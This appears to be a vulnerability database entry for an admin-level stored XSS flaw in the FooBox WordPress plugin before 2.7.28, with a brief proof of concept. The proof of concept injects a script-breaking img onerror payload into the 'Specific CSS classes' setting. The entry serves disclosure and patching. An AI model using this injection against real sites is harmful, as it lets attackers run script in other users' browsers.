Lucene search

K

FooBox (Free and Premium) < 2.7.28 - Admin+ Stored XSS

🗓️ 28 May 2024 00:00:00Reported by Dmitrii IgnatyevType 
wpexploit
 wpexploit
👁 54 Views

FooBox XSS vulnerability - Update by June 11, 2024

Show more
Related
Refs
Code
Go to settings and change the "Specific CSS classes" field to 123"</script><img src=x onerror=alert(1)>alert(1) (Admins and editors are allowed to use JS in posts/pages/comments/etc, so the unfiltered_html capability should be disallowed when testing for Stored XSS using such roles)

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 May 2024 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.000
54
.json
Report